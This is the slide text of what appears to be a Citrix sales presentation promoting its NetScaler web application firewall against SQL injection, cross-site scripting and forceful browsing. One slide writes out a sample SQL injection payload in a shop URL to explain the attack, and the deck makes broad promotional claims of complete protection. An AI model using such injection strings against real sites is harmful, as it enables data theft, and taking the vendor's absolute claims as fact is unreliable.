Protecting Web Application Delivery with Citrix Application Firewall Johnson Mok Systems Engineer Citrix Systems, Inc.
Six Keys to Successful App Delivery Optimizing Web Application Delivery Citrix NetScaler Deliver Web Applications Citrix Presentation Server Deliver Windows Applications Users Citrix EdgeSight Citrix WANScaler Monitor End User Experience Accelerate Apps to Branch Users Citrix Access Gateway Enable Secure Application Access Apps Citrix Desktop Server Deliver Desktops 2
Agenda From Hacker to Criminal Attacks Vulnerabilities and Attacks Effective Defense Your Firewall and IPS Vendor Isn t Telling You NetScaler Product Family 3
Agenda From Hacker to Criminal Attacks Vulnerabilities and Attacks Effective Defense Your Firewall and IPS Vendor Isn t Telling You NetScaler Product Family 4
Business Impact is Far Greater Traditional Network Attacks Most security products focused here Target is viruses, worms, spam, etc. Highly visible, annoying, messy Cost is lost productivity and clean-up Web Application Attacks Attacks with Criminal Intent Target is data behind apps Financial data, identity info Financial implication far bigger 5
Web Application Attack Trends Web Infrastructure provides a vulnerable link to sensitive data Credit Card #s Social Security #s Employee Data Healthcare Records Transaction History The web threat is growing 73% of web vulnerabilities ranked easy to exploit 90% increase in reported web attacks last year 75% of attacks target application vulnerabilities Government acts on privacy and security Gramm-Leach-Bliley Act California SB 1386 Basel II Information Privacy Acts 6
Agenda From Hacker to Criminal Attacks Vulnerabilities and Attacks Effective Defense Your Firewall and IPS Vendor Isn t Telling You NetScaler Product Family 7
Web Application Security Protects 16 of 16 application vulnerability classes Protects 10 of 10 OWASP Top Ten Open Web Application Security Project (OWASP) ALL IIS web vulnerabilities: Automatically Protected ALL web worms - Code Red, Nimda, : Automatically Protected Vulnerability Score Card 1 Buffer Overflow Exploits 2 CGI-BIN Param Manipulation Form/Hidden Field 3 Manipulation 4 Forceful Browsing 5 Cookies/Session Poisoning Broken ACLs / Weak 6 Passwords 7 Cross-site Scripting (XSS) 8 Command Injection 9 SQL Injection Error Triggering 10 Sensitive Information Leaks 11 Insecure use of Crypto 12 Server Misconfiguration 13 Backdoors & Debug Options 14 Web-site Defacement Well-known Platform 15 Vulnerabilities 16 Unpublished Attacks 8
What Is An Application Attack? Malicious Request (but valid) Web Servers Programming Error Complete Customer Records Malicious Database Request 9
The Top 3 Web App Attacks 1. Cross Site Scripting (77% sites vulnerable) ID theft, phishing, password stealing 2. Command Injection Database theft 3. Web Denial of Service (WebDoS) Online extortion 10
SQL Injection Attacks Accessing databases via web applications SQL Injection Attack http://shop/index.asp?category=books' or 1=1 SQL Injection Attack Sending SQL commands to a Web application that when passed to databases execute and allow hacker to gain access or change customer and sensitive information. 11
Cross-Site Scripting Attacks Attacking trust relationships 1 Hacker posts <malicious script> to vulnerable Web application 3 Script captures credential info and sends to hacker 2 Innocent user downloads script and executes Cross-Site Scripting (XSS) Attack Inserting a malicious script enabling identity-theft by the attacker, compromising the trust relationship between a user and a Web application. 12
Forceful Browsing Brute-force penetration of the infrastructure Blogger Wild Bill Kerr investigating the Foley Scandal ABC thought it had deleted from the site the AOL Screen name of a page who received messages from the congressman. By altering the [web page] address, the blogger gained access to the name which still existed on an older version of the [site]. Wall Street Journal, Oct 16, 2006 Forceful Browsing Attack Manipulating request URLs to gain access to content you are not entitled to see. 13
Agenda From Hacker to Criminal Attacks Vulnerabilities and Attacks Effective Defense Your Firewall and IPS Vendor Isn t Telling You NetScaler Product Family 14
Defense Strategies Do nothing and hope for the best Pre-emptive patching against known vulnerabilities Reactive patching against unknown/new vulnerabilities Server-based protections Appliance-based protections 15
Citrix NetScaler 8.0 Citrix Application Firewall Effective defense against application-layer attacks Hardened security appliance High-performance security for Web and Web Services Positive security model - no signatures! Advanced application learning Simple browser-based policy management Advance DDoS Protection 16
Positive Security Offers Zero-Day Defense Only legal (safe) client requests are forwarded to the application Client requests violating best practices and HTTP RFCs are blocked Application Infrastructure Benefits of Positive Security No attack signature databases to maintain Protects application and application logic Real-time protection for known and unknown attacks 17
Defense Demands Full Request Inspection Looking deeper into every frame RFC-compliant content can be dangerous! More intelligence yields more defense. Application Infrastructure Benefits of comprehensive request inspection Buffer overflow protection Cross-site scripting (XSS) protection SQL Injection protection URL mapping eases administration of complex sites 18
Defense Demands Session Awareness And Bi-directional Inspection Served content is memorized on a per-session basis. Client requests not matching served content are blocked Application Infrastructure Benefits of Session Awareness Form-field protection Forceful browsing protection Cookie Poisoning protection 19
Defend Against Encrypted Attacks! Cannot defend against what cannot be seen Encryption terminated at Firewall Optional re-encryption back to servers Application Infrastructure Benefits of SSL Decryption and Encryption Full defense against encrypted attacks Increase web infrastructure performance with SSL offload 20
Complex Web Applications Require Learning Enhancing positive security model to prevent false positives Positive Security Model and Sessionization Ensure What is served must be returned unmodified Modern Web Applications serve JavaScript, Which intentionally modify cookies, fields, etc. Application learning tunes positive security model Eliminating false positives by learning permitted changes 21
22
23
24
Agenda From Hacker to Criminal Attacks Vulnerabilities and Attacks Effective Defense Your Firewall and IPS Vendor Isn t Telling You NetScaler Product Family 25
Traditional Network Security Traditional network security is focused on stopping automated attacks such as worms and viruses at the network perimeter The goal of these attacks is to disrupt by exploiting known vulnerabilities in known systems Traditional security products stop these attacks by creating new signatures each time a new hole is discovered Worms Viruses Network Attacks!! Network Firewalls IPS and Anti Virus Web Servers OS Application Servers and Packaged Apps OS Network Database Servers OS 26
The Web Application Threat Most targeted hacker activity today, however, focuses on customized web apps which are extremely hard to write securely Traditional methods do little to stop these attacks since you cannot write patches or signatures for customized code These threats are far more dangerous because they give untraceable access to data (financial, identity, credit cards, etc) 75% of targeted attacks now target web applications Worms Viruses Network Attacks Network Firewalls IPS and Anti Virus Customized Web Applications Customized Packaged Apps Internally Developed Web Applications NO SIGNATURES WebNO PATCHES Servers App Servers Packaged Apps Database Servers OS OS OS Network DATA 27
Web Application Firewalls Web Application Firewalls protect data by blocking known and unknown attacks in underlying platforms and customized code Targeted Attacks on Sensitive Data Worms Viruses Network Attacks Network Firewalls Web App Firewalls IPS and Anti Virus Customized Web Applications Customized Packaged Apps Internally Developed Web Applications Web Servers OS App Servers Packaged Apps OS Network Database Servers OS DATA 28
Network Firewalls vs. Application Firewalls Open for Business = Open to Attack Network Firewalls Protect at Layer 3 Forward Approved Packets Specifically configured to be open on TCP ports 80/443 (HTTP/HTTPS) No awareness of HTTP/S Sessions Application Firewalls Protect at Layer 7 Block Attacks Bi-directional inspection Fully session-aware Protects web application logic and infrastructure from malicious attacks and erroneous disclosures 29
IPS / IDS vs. Application Firewalls Negative security = vulnerable on day zero Intrusion Detection and Intrusion Prevention Systems (IDS / IPS) Negative Security Model based on Signatures Zero-day attack vulnerable Application Firewalls Positive Security Model enforces correct behavior Every day attack prevention No awareness of HTTP/S Sessions Typically no SSL decryption Cannot discover attacks in SSL sessions Aware of URLs, cookies, and form fields in sessions Full SSL Decryption Can see all attacks Full Proxy architecture 30
Financial Services Insurance AIG Guardian Healthcare egovernment ecommerce 31
32